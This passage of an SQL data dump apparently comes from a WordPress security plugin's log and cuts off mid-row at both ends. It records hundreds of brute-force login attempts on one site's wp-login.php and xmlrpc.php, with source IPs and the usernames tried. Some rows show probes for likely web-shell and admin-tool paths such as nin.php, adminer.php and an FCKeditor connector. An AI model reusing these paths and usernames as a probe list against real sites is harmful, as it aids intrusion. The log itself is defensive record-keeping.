wp-login.php',0,0,0),('91.238.165.67',1542366531,'newd',0,1663926172.6656,7,'yfnVw78H6UladJDZgLcTYQKh','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('91.238.165.67',1542366531,'safet',0,1663926173.9390,51,'WEKUvXk17OofbAlPH4JITjMx','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('134.209.184.76',2261891148,'newd',0,1663926198.5645,7,'raCzycbx3LAiQ7BdoqGYFeXZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('184.75.214.163',3091977891,'joyce',0,1663926225.0264,152,'30knPSs4XdoGKMIxw2VtE5eU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.118.238',2335930094,'newd',0,1663926239.6737,7,'fPy7UL1n2ZhX5l9oOt3rsTMi','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.71.216.37',2806503461,'newd',0,1663926382.7024,7,'OZxGNyLco8EQhIp2JbA0sqBD','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.165',3583549861,'joyce',0,1663926679.9226,152,'CTvjtdHFD7igoXEnRJbWh5GA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.233.116.44',3119084588,'newd',0,1663926933.6005,7,'uYeniPF1gfoCsMVARyNUZQDL','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.233.116.44',3119084588,'malivai',0,1663926935.7084,51,'RvH6QD2kJb73iYCNPqpShwt0','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('177.222.54.214',2984130262,'newd',0,1663926936.3432,7,'NTy1Lg2KQSitZp8BXaH3RIqU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.126.7.173',3514697645,'newd',0,1663927560.0073,7,'SFteL7JWpf6i0b9OsRIk3B52','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.126.7.173',3514697645,'chan',0,1663927561.3144,51,'BK5wOqtmifg4INsJVQ8S6hrX','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('35.224.216.78',601937998,'newd',0,1663927581.4165,7,'J2sWkZi574MGzIBdct1aeVCw','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.130.219.13',1736629005,'newd',0,1663927621.7432,7,'mGiS8Ox439NPfpQKkEYwUncM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.59.96.126',2335924350,'newd',0,1663927662.6903,7,'Tb9KSgDo8hW3tu5eXcjVQGfn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('79.137.65.179',1334395315,'newd',0,1663928208.1327,7,'AaoX8LlcRmtqeG4WjiChvO3V','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.166.182.177',1738978993,'newd',0,1663928786.4932,7,'0R3xqgTaFDdYLzHpJjuU9KMe','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.59.96.126',2335924350,'newd',0,1663929073.5934,7,'SE2i6lfFpe4hJq3T9WrucoOK','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.186.158',1168358046,'newd',0,1663929095.6786,7,'fMkFCotGdBPsjp1ODmEbQSY3','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('93.113.111.193',1567715265,'newd',0,1663929374.5082,7,'3APNqsb78IYRkyvxtlwB46fU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('140.246.255.164',2364997540,'newd',0,1663930051.6921,7,'RXq29xV1YJi0PfjOkHI3KFzu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('64.90.36.102',1079649382,'newd',0,1663930491.9978,7,'97NaDkKYf640g8bQpesv3Rt2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('80.88.88.149',1347967125,'newd',0,1663930524.4206,7,'3oiP6jFkrHOfcItMJlEnw9vq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('45.252.251.8',771554056,'newd',0,1663930567.5895,7,'oqirFMHRgV5c4jPtE1ALwIz6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('45.252.251.8',771554056,'chan',0,1663930569.4264,51,'gASb7f5roPsJEcUBTivR1VI0','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('109.233.192.83',1844035667,'newd',0,1663930595.1559,7,'pBz2yfbrsE43UZqOeY51V9SA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.59.96.126',2335924350,'newd',0,1663933345.3427,7,'VBsQOumtaChkGZJLxSR609MY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('1.117.250.215',24509143,'newd',0,1663933371.4456,7,'nZy5ACO1XMd4JxUioL7rkPKm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('151.80.24.73',2538608713,'wwwadmin',0,1663933494.0680,51,'kbRK7ivwMQhfqpjJsPgTlZG8','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.79.242.130',860877442,'admin',0,1663934294.7519,152,'OPFs3wdzLThjlmRyoZnSpHf9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('57.128.45.42',964701482,'',0,1663934762.4436,55,'fXyRaPSKB0Y57mbAz8CgHQJM','','19|0|0|0|cteisys.com/wp-admin/css/colors/blue/nin.php',0,19,0),('139.59.96.126',2335924350,'newd',0,1663934772.8248,7,'E1F7AGsSmgeOpxXVcCkHZnTr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('57.128.45.42',964701482,'',0,1663934773.1670,55,'3c4KfzAwFNxtL0bslDeGkvg9','','19|0|0|0|cteisys.com/wp-admin/css/colors/blue/nin.php',0,19,0),('85.146.18.88',1435636312,'newd',0,1663934808.4824,7,'mxrSH48kT2V91gLPR7stJfvU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.255.64.58',872366138,'newd',0,1663934907.2343,152,'FbJKuOkc2UaDMRveHysWB48p','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.152.164.156',1738056860,'newd',0,1663935220.7507,152,'WcJatsn3Rpm7gq6e5TUvoZhX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('143.110.137.82',2406386002,'newd',0,1663935539.9979,152,'AniCTNhQgO7dDsvLSV0XIqYU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.148.67.173',3482600365,'newd',0,1663936200.5041,152,'PcVYnFbioezrAC3ZDqv4Tayu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('212.103.4.29',3563521053,'newd',0,1663936206.5495,7,'R3GzEI6nufmVLFgS7MvqJwbj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('109.168.97.89',1839751513,'newd',0,1663936253.7734,7,'gmoeh69JQEILlFuPkXDvsHfy','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('171.244.16.103',2884898919,'wadminw',0,1663936525.6333,152,'RFSjkpKl0B1Vm8HrGLqgDxiU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.85.224',2335921632,'newd',0,1663937636.1446,7,'jNr2W6GJEpkovQdc0Ie915bz','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.212.34.69',3168019013,'newd',0,1663937676.8275,7,'UufV4TLvp8F1gJMZaIeo2lkc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('135.181.60.103',2276801639,'newd',0,1663938190.2670,7,'hcNCmApot6qzavgeMxl5DfjK','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('135.181.60.103',2276801639,'zhihua',0,1663938191.6643,51,'2qcEvTIl0Z1gzW5p9sPCBMDY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.114.72.18',796018706,'newd',0,1663939091.6182,7,'lset2gD9LMRZH8j1TmdfC45Y','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('151.106.41.64',2540316992,'newd',0,1663939129.0074,7,'R1UxniKIcXVy0WoQpHaeA8qD','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.233.89.214',3270072790,'admin',0,1663939687.6546,152,'Tfa12pBmqUedo4vRrSEWGy78','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.55.255.20',3476553492,'admin',0,1663940027.7929,152,'de60APm7DNslEZ3OTXGcIqrM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.38.237.45',858189101,'newd',0,1663940358.8233,152,'AxwyFYj0D9ipaNWsHfIKlBCP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.65.234.0',574745088,'newd',0,1663940531.3153,7,'PtiBuUEqyN1RDrp4ons9A7KG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.240.28.177',2733644977,'newd',0,1663940572.1819,7,'DIYwuFJ2BEfsGk7L5Ugp1acO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.59.165.88',3258688856,'newd',0,1663940708.2582,152,'Fw8fkebsuznoSqpdaW76VYDl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.209.28',2994786588,'newd',0,1663941042.0311,152,'a4Vi5nh9xlBcmY6Rb8vJIgj2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.91.151.60',861640508,'newd',0,1663941969.4376,7,'nIRwtMOTjdzEH8ap20QWiJCg','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('85.191.40.94',1438591070,'newd',0,1663942013.1323,7,'9OyA1QpS7BVUYrs4fGmbtEjz','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.79.242.130',860877442,'newd',0,1663942161.1302,152,'7XQevPFBcjCln1ZrfIy9YEsL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.212.34.36',3168018980,'newd',0,1663942561.0436,152,'Fo0YuTCbnzGa68X357qAgd24','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('37.218.255.45',635109165,'newd',0,1663942951.2711,7,'HPfl3jQkdiMTveWpqLFhGB0s','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('37.218.255.45',635109165,'contact',0,1663942952.7201,51,'gD2S5ToNPuQzCY8MUmcEpk7w','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.59.73.237',2335918573,'newd',0,1663943351.0448,152,'TcnlgrH0Lf3yvBpW1sq5GAEU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.118.238',2335930094,'newd',0,1663943427.8646,7,'uUPjQ45tzyB287fGZwopOrHh','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('13.81.59.92',223427420,'newd',0,1663943470.1399,7,'lJfkwVWjPH781ngMECyBLtYu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.144.238.41',865136169,'newd',0,1663943712.7843,7,'Cv5USxeOzGTr7QgMdWE80Fo6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.144.238.41',865136169,'proog',0,1663943714.0268,51,'0B7JXpxvIUbOVnRDq5a9KmMZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.182.89.35',3115735331,'newd',0,1663943742.3608,152,'iKbaSl6e2vuhsVynBqQJEZHt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.52.134',1364735110,'newd',0,1663944136.9603,152,'r1biAGDayNZ7VP4mLj2H6lkU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.199.81.163',3334951331,'newd',0,1663944544.4186,152,'E7bMAgT0uceWXi96JyohGKLB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.7.8.169',1728514217,'newd',0,1663944642.0662,7,'8721zfuadC305XQRjopiLMwg','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.7.8.169',1728514217,'baze',0,1663944643.5926,51,'H0oR132VNcCbyKElGn9uAOis','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('46.32.228.70',773907526,'newd',0,1663944882.3997,7,'XbLU94GhsAylNDCEnM5ROzwr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('54.37.156.240',908434672,'newd',0,1663944926.2992,7,'tKQNZRsXyIwJDWfYugh5Mj0c','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.210.53.165',869414309,'newd',0,1663946208.4265,152,'Jg4zNohpFRZUvQ1OeDbWsuVm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.57.9',3515693321,'Joyce',0,1663946264.7946,51,'L0wDbKNPFAnth3xY25ZMdpk4','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('75.119.157.181',1266130357,'newd',0,1663946344.5581,7,'VYOarzbQiK1xT8G3XneLZuwS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('23.97.205.210',392285650,'newd',0,1663946385.9544,7,'TyCJE6olWKnpmRM4Bdix3vO7','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.227.178.147',3236147859,'newd',0,1663946639.2966,152,'eBQ5rF3zVfwYvuGtUkRDy7Om','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.15.183.168',856668072,'',0,1663947353.9984,55,'AmSnQBOce86v5qN0w1V2CpGr','','19|0|0|0|cteisys.com/editor/editor/filemanager/browser/default/connectors/php/connector.php',0,19,0),('168.119.80.254',2826391806,'newd',0,1663947811.9447,7,'BQ3fk6q9lRLbZrKio1dNzAv5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('207.154.250.8',3483040264,'newd',0,1663947854.2544,7,'GcEa2xnYDCXeZUpOH8ANFhm5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.240.211.236',2733691884,'newd',0,1663947927.6143,152,'6p5eh7ixT40mjnwWO1KPNvQB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.50.216',3328324312,'Joyce',0,1663948107.1859,51,'20DlUgthLdQriuox3sqpNfjw','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('151.80.20.26',2538607642,'newd',0,1663948371.1015,152,'hB6uOFMTojKle3DC0NLkyIAG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.142.151.223',3582891999,'newd',0,1663948453.5681,7,'p7iRQq4bwgrtjckyTUl3osaf','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.142.151.223',3582891999,'enamad',0,1663948455.1700,51,'bktNsiVQPyEu0Y6FOH4rUTBR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.62.110.145',2990435985,'newd',0,1663948828.3836,152,'5VsX6OCpvoWYa3ztZwU7rF0e','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.69.3.180',1833239476,'',0,1663949080.8251,55,'cr7Dj3g5lZ9wFEz8NoPvRWHq','','19|0|0|0|www.cteisys.com/adminer.php',0,19,0),('212.16.164.132',3557860484,'',0,1663949204.3142,55,'aDUZJuNhY4kFrtpObwPi0ldI','','19|0|0|0|cteisys.com/old-index.php',0,19,0),('159.89.207.135',2673463175,'newd',0,1663949267.4299,7,'bA81GZzrpdtenI4CV60kQUST','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.115.24.165',796072101,'newd',0,1663949310.0255,7,'pEUlDZ8CS3TFNufvPQcqMWxL','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.83.37.23',861086999,'newd',0,1663949731.1694,152,'XRf2SztMh6Aj5BrVilywQoam','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.212.34.36',3168018980,'newd',0,1663950158.1215,152,'iR7z3HkwAPTgthWs8vecoG4Q','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.184.76',1386592332,'newd',0,1663950578.1649,152,'edhopfAD0QqbPYmZ2HGX9Jks','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.175.111.233',1806659561,'newd',0,1663950719.4295,7,'ydkBHSLsp3lh1PUAG2xVMiKq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.138',3583549834,'joyce',0,1663950743.2751,152,'DWiFKy8mdLOwlT9rvJscXG5C','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('202.21.38.119',3390383735,'newd',0,1663950761.4422,7,'ZvNpmS58RrlFJWhMa7Yx46Ct','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.132.233.34',2391075106,'newd',0,1663950801.9192,7,'giTrFycVvRXLdH1z3JOfp7SM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.132.233.34',2391075106,'phlox',0,1663950803.2623,51,'Yg9qvyN4bUz68p0V3WfOacjd','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('45.77.125.145',760053137,'newd',0,1663950812.5938,7,'L0hJfVqpBXgCdx1sYZHIoFi7','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('45.77.125.145',760053137,'vernon',0,1663950813.3534,51,'ZjvpurAOik0tf1XnK2cbMmga','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('107.189.6.184',1807550136,'Joyce',0,1663951054.3410,51,'vNEQGtapgHdT5JxAu7UYnfS3','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.65.147.193',2671875009,'newd',0,1663951311.7736,152,'IOBEDNFMoQZy79RTl8V0vCkb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.253.243',2733768179,'newd',0,1663951686.1598,152,'c7iEKQmC1eBbFLXguDwASPsT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.162.99',3583550051,'joyce',0,1663951970.2335,152,'ls5U6WpYCa17NRwV43HJd8Ak','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.180.107.103',1806986087,'newd',0,1663951971.5542,152,'I4k0gnd5ZNE2iVYFc3m8u9SK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.65.234.0',574745088,'newd',0,1663952153.9781,7,'y48gOzBW0SMxDv23wjKRtq5d','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('13.81.59.92',223427420,'newd',0,1663952194.1983,7,'eBbIhHpEPnA5WlKJyLvGZ7wS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('115.79.139.135',1934592903,'newd',0,1663955027.0252,7,'xWE0jgcdvUsyDFAPBLCXaISo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('154.0.175.35',2583736099,'newd',0,1663955223.1881,152,'hmteV04jp3T8HfOgbylIEwzF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.30.89.27',3223214363,'joyce',0,1663955376.7490,152,'kEVYhPaO3n0LxUIfX7sNi9MJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.172.67.151',2813084567,'newd',0,1663955829.9472,152,'Y2jMoRaBb8dnpglwvqhU9HE7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.214.123.41',2731965225,'newd',0,1663956160.5303,152,'njcJY8kPHXex0FaBuzZlgmDK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('168.119.80.254',2826391806,'newd',0,1663956379.2323,7,'7JaOwKfC3MmgGurF6SsN51DR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.113.153.235',3497105899,'newd',0,1663956420.0773,7,'sYSWN2pdMHDek4T7F6tLvb0j','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('83.143.116.3',1401910275,'newd',0,1663956475.2158,152,'eyLj9oBrHAZhQiu46W23ObaD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.169.177.64',3232346432,'newd',0,1663956789.6746,152,'35syHpbawuI24zjBoEnfXhYA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.57.9',3515693321,'Joyce',0,1663956803.6473,51,'DAwmj18VGxS0TPMfagORur5F','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.0.140.186',2634058938,'newd',0,1663957432.4230,152,'GRBMrCqHme5E4No1zlaf803S','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.138.252.123',3649764475,'joyce',0,1663957520.2458,152,'0n7vwG2RqSOgjH4s91XAyrNt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.90.101.113',1046111601,'newd',0,1663957707.2570,152,'I8OidoJWfcxYBmPNsj09wUbg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.19.179.195',2249438147,'joyce',0,1663957716.5106,152,'2EAxR8XjChpo0Ji5B1rIQHsV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.144.87.29',2727368477,'newd',0,1663957755.4945,7,'7ibZQxUA3uVNsaE04XyDmvKf','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('36.94.142.166',610176678,'newd',0,1663957797.2167,7,'xY1bn3jAP2WFchG0tIpdHska','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.57.9',3515693321,'Joyce',0,1663957902.3284,51,'aL6omNEPyX0JWQKet1jqSscw','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.0.216.181',2717964469,'newd',0,1663958025.6141,152,'8WcD0ZHx7dNLRK4wmprYCPsv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('85.128.143.142',1434488718,'newd',0,1663958304.7335,152,'2Jk9YWd8a4Iv1Rphr3zsoCSc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('130.61.143.194',2185072578,'newd',0,1663958620.9227,152,'mxEeJkSn6MIY7RaB8TjrFszU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('94.136.71.71',1585989447,'newd',0,1663958850.6196,7,'wyNBmWG04JjOg6S8xbX3EHF5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('94.136.71.71',1585989447,'chan',0,1663958852.0079,51,'AhDcPkCQjaNVHLBp1tUvYw8O','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('67.205.62.27',1137524251,'newd',0,1663959114.9468,7,'uYcdkQj2JTmXhNVlRaWMvtPB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.89.199.237',2673461229,'newd',0,1663959154.8312,7,'1jcaypOTYUZMXu5Po8tsEK2b','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('54.36.110.109',908357229,'newd',0,1663959192.3266,152,'1prhe3g7dT2XFPCOlKZtYfuj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.131.189.63',1753464127,'newd',0,1663959482.1970,152,'BLyh1Q0XJrx2n4HAUTkjP5bz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.184.76',1386592332,'newd',0,1663960084.4562,152,'64QiUTMa0cepJI8DXZS9rLWB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.245.38.42',2650089002,'newd',0,1663960378.1763,152,'ag6KIzlPfk25TtB3piNovJQ8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('165.22.109.42',2769710378,'newd',0,1663960478.1507,7,'DBwTPqbJS1nQNfFOGHCZ3ecy','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.99.201.91',3227765083,'newd',0,1663960518.5487,7,'MAmr0d5gxhRabJ2YvXqFEl3P','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.93.170.99',2388503139,'newd',0,1663960682.8713,152,'7JH8nqMCFoOZlfhzBNID5UeS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.118',3583549814,'joyce',0,1663960914.7008,152,'rxaMR1y9SPw6FlH3ECibjYKN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.214.155.200',2731973576,'admin',0,1663961339.6375,152,'37qNKrILxeb8Y9sukQJlcyWp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.184.76',1386592332,'admin',0,1663961632.4901,152,'8NpI1tBdOGEHcgWMk2obu4ie','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.195.148.190',868455614,'newd',0,1663961836.4957,7,'pBbzEDqL4ArTCZNPXg3dHlSa','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('67.205.39.9',1137518345,'newd',0,1663961875.3894,7,'F1mjafEHuQeWXwk3NpVMPogI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.59.20.111',2335904879,'newd',0,1663961955.8993,152,'hOXmuQvTcqglEUYaSFnojpkC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('89.253.233.129',1509812609,'newd',0,1663961999.8765,7,'EIM1JtDCmsPbfT2QxrFaV30e','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('89.253.233.129',1509812609,'justin',0,1663962005.1153,51,'l9cXuHVYAi6Qq1Jfgw0MoDNC','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('128.199.80.18',2160545810,'newd',0,1663962291.0685,152,'ZOkQ7dHxP6bunDXAGBwt4FzN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('77.244.214.239',1307891439,'stang',0,1663962335.4654,51,'0SuC9LUnzvcDZ4YgVh23bmT1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.57.9',3515693321,'Joyce',0,1663962739.9751,51,'vsJWHCj4cAU8enBtVFozaK9p','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.38.113.53',858157365,'newd',0,1663962761.8602,152,'eHJzoEi7hfMGYq8gAarks6um','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.162.228.171',765650091,'joyce',0,1663962906.4886,152,'GVtKfXdHMDs7Tzy0xZweNFU2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('61.219.171.85',1037806421,'newd',0,1663963141.9624,152,'Cpcl8RjZdqTunAogk9OEVBL1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.52.8',1364734984,'newd',0,1663963207.4936,7,'HbekOzrosKNvXC9VUtT8qES2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('61.219.43.253',1037773821,'newd',0,1663963247.5717,7,'FQNTswDyIY8zoX4mcPLW6gt0','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('119.18.52.177',1997681841,'newd',0,1663963450.0443,152,'EPfBAkuaNse4Qr98Clh3ivWg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.142.173.121',143568249,'newd',0,1663964154.1485,7,'8vVI07zZPR2YoF5WgaUHEmDb','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('45.55.44.23',758590487,'newd',0,1663965191.3933,7,'lLQfxFMKAXdj3hDPsvykuU1Z','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('36.94.142.166',610176678,'newd',0,1663966221.6353,7,'IyGEnw0tFAqbXSWTxm3sldMJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.162.209.171',2997014955,'joyce',0,1663966643.5934,152,'uSJaev249xLBrgmlyVQ1itwY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('165.22.202.244',2769734388,'newd',0,1663966762.2351,7,'WV2L3YArEIkfdco6Ov9pC8FJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('165.22.202.244',2769734388,'aadmin',0,1663966763.5414,51,'XbEZ2RHtY7z6sjJoAxrkhP8d','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.165.198.224',3164980960,'newd',0,1663967264.0036,7,'2aWhkIrD78uxbGotJ1VO9UTE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('152.89.160.131',2556010627,'joyce',0,1663967722.4257,152,'ogM9sLyIFQGAdxVt1rzJSuBw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('146.70.76.43',2454080555,'joyce',0,1663967855.4015,152,'vICuV1BDWpqbtsLxzT5SEiec','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('88.212.236.252',1490349308,'newd',0,1663968307.6752,7,'b93die0CpxJ5hz4lZc2VtaQ1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.196.200',1168360648,'newd',0,1663969331.1336,7,'aXFRce4oDfvZGzB1Txhb9rup','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('80.88.88.149',1347967125,'newd',0,1663970363.9473,7,'Qw9KeCjxJTyP1oYX5B4vm2ad','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.75.15.189',860557245,'newd',0,1663971382.2048,7,'5NJPBcxZ6TkvVQKerHMthAlU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('88.212.236.252',1490349308,'newd',0,1663972431.0193,7,'kHFo2aIeCld8hRzKmNQLiXtZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.162.10',3583549962,'joyce',0,1663972465.7782,152,'nOhjwQyaJNVempBKi5rL1GbF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('165.22.109.42',2769710378,'newd',0,1663973472.8656,7,'oDacZHCw9lf4N3e5k062XK1J','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('82.218.176.68',1390063684,'newd',0,1663974051.0970,7,'fCYgQkm3F0RUvwxby8hlu21r','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('82.218.176.68',1390063684,'editor',0,1663974052.4074,51,'JKkT1ysUB3nVPWcOqFLGm46E','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('121.42.231.47',2032854831,'newd',0,1663974517.2923,7,'4x6SYh2XD0qFQNAoJjdmBUMZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.240.28.177',2733644977,'newd',0,1663975565.0762,7,'zbpRgiVoa9xLjBt12GnCNhsW','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.162.165',3583550117,'joyce',0,1663976252.2403,152,'iCEXe14MIKq9nBYDt2p8Tsmx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('69.163.224.107',1168367723,'newd',0,1663976605.2926,7,'3yIY1paNhrM0QbltXnDV8mGo','','0|0|